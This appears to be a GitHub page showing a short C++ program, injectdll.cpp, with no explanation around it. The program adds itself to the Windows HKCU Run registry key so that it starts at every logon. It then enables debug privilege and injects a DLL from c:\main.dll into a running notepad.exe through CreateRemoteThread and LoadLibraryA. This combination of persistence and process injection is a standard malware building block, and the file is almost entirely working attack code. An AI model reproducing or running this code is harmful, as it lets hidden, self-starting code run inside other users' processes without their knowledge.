-
Notifications
You must be signed in to change notification settings - Fork 2
/
injectdll.cpp
107 lines (99 loc) · 2.63 KB
/
injectdll.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#include "tchar.h"
#include "tlhelp32.h"
#include "string.h"
#include <iostream>
using namespace std;
main(int argc,char * argv[])
{
HKEY hkey;
long reg = RegCreateKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hkey,NULL);
if (reg != ERROR_SUCCESS)
{
return 0;
}
reg = RegSetValueEx(hkey,"injectdll.exe",0,REG_SZ,(BYTE *)argv[0],strlen(argv[0]));
if (reg != ERROR_SUCCESS)
{
return 0;
}
RegCloseKey(hkey);
DWORD procid;
DWORD dwflag;
PROCESSENTRY32 pe32;
HANDLE procsnap;
LPCTSTR dllpath = "c:\\main.dll";
pe32.dwSize = sizeof(pe32);
//GET process svchost
procsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (procsnap == INVALID_HANDLE_VALUE)
{
printf("fail list process!\n");
}
BOOL f = Process32First(procsnap,&pe32);
while(f)
{
printf("%s %d\n",pe32.szExeFile,pe32.th32ProcessID);
if (strcmp(pe32.szExeFile,"notepad.exe") == 0)
{
procid = pe32.th32ProcessID;
break;
}
f = Process32Next(procsnap,&pe32);
}
printf("\n%d\n",procid);
CloseHandle(procsnap);
//GET PRIVILEGE
TOKEN_PRIVILEGES tp;
HANDLE token;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&token))
{
return 0;
}
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
return 0;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if(TRUE)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}
if(!AdjustTokenPrivileges(token,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL))
{
return 0;
}
//DLL inject
HANDLE hprocess = NULL;
HANDLE hthread = NULL;
HMODULE hmodule = NULL;
LPVOID pdllbuff = NULL;
DWORD dllnamesize = (DWORD)(_tcslen(dllpath)+1) * sizeof(TCHAR);
DWORD writesize;
LPTHREAD_START_ROUTINE injectthreadproc;
hprocess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);
if (hprocess == NULL)
printf("error 1");
if(!(pdllbuff = VirtualAllocEx(hprocess,NULL,dllnamesize,MEM_COMMIT,PAGE_READWRITE)))
printf("error 2");
if(WriteProcessMemory(hprocess,pdllbuff,(LPVOID)dllpath,dllnamesize,&writesize))
printf("write success");
printf("%d %d\n",dllnamesize,writesize);
hmodule = GetModuleHandle("kernel32.dll");
DWORD threadid;
injectthreadproc = (LPTHREAD_START_ROUTINE)GetProcAddress(hmodule,"LoadLibraryA");
hthread = CreateRemoteThread(hprocess,NULL,0,injectthreadproc,pdllbuff,0,&threadid);
printf("%d",threadid);
WaitForSingleObject(hthread,INFINITE);
//CloseHandle(hthread);
//CloseHandle(hprocess);
//printf("%d",GetLastError());
}